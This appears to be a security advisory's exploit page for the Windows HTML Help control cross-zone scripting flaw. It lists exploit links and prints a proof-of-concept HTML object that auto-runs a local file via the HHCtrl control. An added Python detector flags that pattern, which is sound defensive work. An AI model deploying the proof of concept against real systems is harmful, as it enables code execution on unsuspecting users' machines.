
Microsoft Windows HTML Help Control Cross-Zone Scripting Vulnerability

A reliable exploit (injecthh_op_2-code_by_liudieyu.zip) has been made available by Liu Die Yu <liudieyu@umbrella.name>; the payload.exe file has been removed from this archive. Further details can be found in the associated discussion reference.

An exploit has been published on the following Web page:

http://www.malware.com/noceegar.html

An additional proof of concept (files.zip) has been made available by Michael Evanchik <mcbain@aol.com>; instructions on how to configure this proof of concept can be found in the associated message reference.

A further proof of concept allows for the execution of arbitrary script code in other domains:

http://www.persiax.com/pocs/htmlhelp/cs.htm

http://www.persiax.com/pocs/htmlhelp/cz.htm

The following proof of concept, provided by Paul <paul@greyhats.cjb.net>, allows for local zone security bypass and eliminates user interaction:

<OBJECT id="hhctrl" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194" width=7% height=7%
style="position:absolute;top:140;left:72;z-index:100;">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;C:\WINDOWS\PCHealth\malwarez[1].htm">
</OBJECT>
<script>
hhctrl.HHClick();
</script>
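The proof of concept above is recognisable from its static shape: an OBJECT bound to the HTML Help control's CLSID whose Related Topics item values carry a "command;" prefix or point at a local filesystem path instead of a help topic. The following detector, added here as an example for defenders and not taken from the advisory or from any of the proof-of-concept authors, parses HTML with Python's standard html.parser and flags such instances; the sample documents, the placeholder path and the local-path heuristic are constructed for this example.

```python
"""Static detector for HTML pages that drive the HTML Help ActiveX control (HHCtrl)
with suspicious Related Topics items, the pattern used by the cross-zone PoC above.
Added example for defenders; not code from the advisory or from any PoC author."""
from html.parser import HTMLParser
import re

# CLSID of the HTML Help control (hhctrl.ocx), as it appears in the PoC on this page.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# Heuristic (assumption for this example): a Related Topics item normally names a help
# topic ("title;topic.htm"), so a Windows drive-letter path in an item value is unusual.
LOCAL_PATH_RE = re.compile(r"(?i)[a-z]:\\")


class HHCtrlParser(HTMLParser):
    """Collect every <object> bound to the HHCtrl CLSID together with its <param>s."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.objects = []        # list of (object id, {param name: value})
        self._current = None     # object currently being filled, if any

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "")
            if clsid == HHCTRL_CLSID:
                self._current = (a.get("id", ""), {})
                self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current[1][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None


def find_suspicious(html):
    """Return (object id, param name, reason) triples for HHCtrl instances whose
    ItemN values use the 'command;' prefix or reference a local filesystem path."""
    parser = HHCtrlParser()
    parser.feed(html)
    parser.close()
    hits = []
    for obj_id, params in parser.objects:
        for name, value in params.items():
            if not name.startswith("item"):
                continue
            if value.lower().startswith("command;"):
                hits.append((obj_id, name, "command; item"))
            elif LOCAL_PATH_RE.search(value):
                hits.append((obj_id, name, "local filesystem path"))
    return hits


# Constructed sample modelled on the PoC above; the target path is a placeholder.
MALICIOUS_HTML = """
<OBJECT id="hhctrl" type="application/x-oleobject"
        classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
        codebase="hhctrl.ocx#Version=5,2,3790,1194" width=7% height=7%>
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;C:\\PLACEHOLDER\\payload.htm">
</OBJECT>
"""

# Constructed benign sample: an ordinary Related Topics menu pointing at help topics.
BENIGN_HTML = """
<OBJECT id="help_menu" type="application/x-oleobject"
        classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Related Topics">
<PARAM name="Item1" value="Installing the product;install.htm">
<PARAM name="Item2" value="Troubleshooting;trouble.htm">
</OBJECT>
"""

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_HTML), ("benign", BENIGN_HTML)):
        print(label, find_suspicious(doc))
```

Run against a saved page or a proxy's HTML capture, the script reports each HHCtrl object and the item that triggered the match; an empty list means no suspicious Related Topics items were found. The local-path heuristic is deliberately loose and is meant for triage, not as a definitive verdict.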

Another proof of concept exploit has been made available by Greyhats that leverages this issue. The exploit can be found at the following address. Please note that this exploit has not been verified by Symantec.

http://freehost07.websamba.com/greyhats/sp2rc.htm

A new proof of concept has been made available that allows applications to be executed with parameters:

http://www.freewebs.com/shreddersub7/htm.htm

This exploit has not been tested or verified by Symantec and is currently under analysis. This record will be updated if new information becomes available.

Further exploit code:
Copyright 2008, SecurityFocus